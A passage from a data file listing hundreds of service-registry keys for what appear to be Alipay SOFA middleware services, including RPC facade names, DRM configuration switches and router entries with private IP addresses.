PluginUseManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.open.common.CatalogOpenFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.102.210.187#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.echannelcenter.common.service.facade.mng.EchannelManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.preHost,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradeexprod.common.service.facade.DepositBackTransferService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.envcenter:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transfercenter.common.service.facade.ldc.api.TransferRProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promox.facade.scene.SceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC-pcinstacc-queryfinormstate-schedule-serverless@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auth_center.common.service.facade.v2.service.AuthCodeCompitableService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.232.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.170.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue28#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbaservice.common.service.facade.sync.api.ProductRedeemStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.domain.DataDomainOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.recquality.common.service.facade.api.AntVenusCpCaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.promokernel.common.service.facade.api.AppletTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.fluxnet.common.service.facade.api.TransactionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:antsecurity_uctfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker-tutorial:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.240.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.indirect.IndirectActivityQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.forum.manager.ForumAdminManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.frequentPollingControl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finriskportal.facade.api.XJRobotPMFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.opscore.common.service.facade.OpsSpiActionServiceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:monitorActionStatusTaskSplitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zmngglobalali@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:app_capacity_checker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.TaskFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbgrouppurchaseprod.common.service.facade.member.GroupPurchaseGroupMemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudlego.common.service.facade.CloudlegoServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.gray.DeviceWhitelistQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopencore.common.service.shelf.facade.ShelfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rcconsultcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.1.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.autoaccess.EbppBatchTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.merchant.common.service.facade.OrderLinkRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_budgetAppendSuccessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.weather.WeatherCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.service.BPQueryService:1.0:mrchasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.ChatMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=cn.com.antcloud.common.auth.client.config.ZauthMigrationDrmConfigTrigger.whiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemng.facade.ebppgw.InstConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.seller.InsDxDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.turnOffCacheRetry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@finsteward#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.caprod.service.ukey.facade.UkeyVoucherManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.255#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:caprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergwsmall22@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.204.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.ufe.engine.facade.runtime.UfeFeatureCalService:1.0:antfeaturecloudcrcen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkperf.common.service.facade.check.service.onlineinterface.OnlineProdCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:digitalidentity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.point.service.PointService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.codec.CodecServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.card.api.PerformanceCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifinbatch.service.facade.spi.FileDetailPushService:1.0:iexchangeFileDetailPushService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSDATAPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:fraudmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.tax.TaxRefundCspService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.InstLoanLogRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smcp.facade.quake.QuakeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.opscloud.CheckPlatformService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.PraiseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.service.account.mypass.MyPassService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.uic.common.service.membership.biz.MembershipBizReadService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.244.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.antpim.common.service.facade.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.clearingcenter.facade.api.ClearingConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:lendpofprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.assetcore.facade.CommonUserDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthBizTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antassistant@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.FundProductService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue43#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ireserve.facade.api.AllocateOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.bccomparacenter.facade.ComParaOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acwareslifecore.common.service.facade.OfferMigrationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dataclassification.facade.service.LineageTagSpreadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.zcache.CachemeshFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdeduct.common.serivce.query.UsageAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fin.pdcore.common.service.facade.adapter.p2p.AdapterP2pProductQueryFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.supermarket.DmActivityPopupPageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.97.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crsociety.api.WhiteSystemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.sci.SciItemMetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mq@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.89.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaybuserviceAuthTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.girisk.common.service.facade.api.regulatory.RegulatoryReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zscale.api.RayamSchedulerTaskFacade:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExRateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.menu.api.MenuConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bis.common.service.facade.papers.PapersDriverLicenseAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.bis.BioFileFacade:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:internal_alisis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesync.common.service.facade.admin.MobileSyncQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemrp.common.service.facade.SceneDataTraceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.cache.DrmMappingRuleCacheRefresh.pdEventCacheRefresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nfcc.common.service.facade.egress.AppDomainEgressQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.LogConfig.logLevelView,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paydecisioncarina.service.spi.agent.AgentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.AdminMediaSceneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iexchange.service.facade.api.query.ExchangeRateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ctuofflineplt.common.facade.service.DataQualityService:1.0:ctuofflineplt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.service.facade.backend.CardAbTestRealDataApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.210.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.gloanuserproxy.facade.api.MemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.facade.ProductFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csevaluate.inspect.InspectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.BusinessResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.poscoreTairCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:channelspop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.morderprod.common.service.facade.TransCodeSpiFacade:1.0:mrchportalcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkOperateLogMoblieService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CHARGEFRONT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.needQueryHisCheckServiceType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ANTSYCM#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_B_PORTAL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finsteward.common.service.facade.survey.PromoSurveyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.integration.cache.CacheClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.service.monitor.XflushDataQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.mpoint.facade.MpointFlowoutSimpleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanlend.common.service.facade.api.repay.plan.LendRepayPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanrepayprod.common.service.facade.service.repay.LoanRepayBudgetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCLOANLEND#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:app_cap_check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoCarHisFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.HealthDegreeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dms.common.service.DmsModelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.orderfront.common.service.facade.solution.api.SolutionProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ROPSERVICE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:publicDomain_malgo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.showRestrictSelfCashier,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.193.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fincommontaskhub.service.facade.service.spi.MergeService:1.0:finopencore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.FinResultSumRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcpromochannel.service.channel.PcPromoChannelMessageBoxFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.146.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pvsofaserver:name=com.alipay.zcache.log.pvsofaserver.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ccr.facade.ArriveTimeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.container.facade.api.KgopenOperationFacade:1.0:kgopen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isecurityexprod.core.service.databazaar.DataBazaarServiceInvokeProcessor:1.0:cnsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.TemplateSchemaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdtunical.common.service.facade.http.cicadacmarket.MarketFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.39.185.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.sp.business.BusinessMessageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbomp.common.service.facade.spi.KbtActivityMetaQMessageCallback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:testExecutorFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.190.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:antfarm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.opm.service.facade.apimng.ApiSpecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.168#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cfpcenter.emc.common.service.facade.api.EmcKhzjBoardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_CIFPROCESS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.gfinvest.facade.api.security.SecurityDealFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.sh.common.facade.AntcloudFeatureInternalRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:promofrontcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.customerTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fincommonbff:name=com.alipay.fincommonbff.drm.Switches.writeNewCrs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:migrateApprove_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.subcard.query.SubCardChargeConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.gzone.activity.platform.ActivityTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.query.api.ErcReconCodeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.api.RecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.plugin.common.service.facade.api.PluginSDKPageChildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcoin.core.service.processor.LdcProcessor:1.0:paymentPayeeProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.giftprod.common.config.drm.wufu2020.ActivityTaskDrm.preDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:dchainassetreg@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcif.common.service.facade.api.user.UserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP-F-MINITRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:smallProgramantProcessSecurityCallBackHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.securitycore.common.service.facade.policy.api.SecurityPolicyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.nodejs.ConsumerService:1.0:dont-load-plugin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:pcardcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dss.endpoint.rest.facade.operation.OperationJdbcwriterFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.service.facade.biztype.BizTypeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.category.CategoryMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.execute.DataExecuteDriver:1.0:ereconDataExecuteDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rest.SlsRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.queueType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.150.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdatasync.common.service.facade.ProcessStateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:asttshipcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.checkersdk.service.ChangeRiskDefenseService:1.0:sdchecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.MerchantQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.integration.chngservice.proto.sync.OpsChangeSyncService:1.0:iseemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiangw.common.service.client.service.InsGatewayExterfaceInvokeService:1.0:autoaftermarketunit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintransfercore.common.service.facade.transfer.FinAppointDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.160.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:FINFUND@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcie.common.service.facade.CreditLimitReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:smcp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.31.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.riskservice.spi.OpsChngAsyncRiskService:1.0:finriskeventseek_check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.common.repo.FinsGzBizLockRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.shop.ShopPublicMenuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue47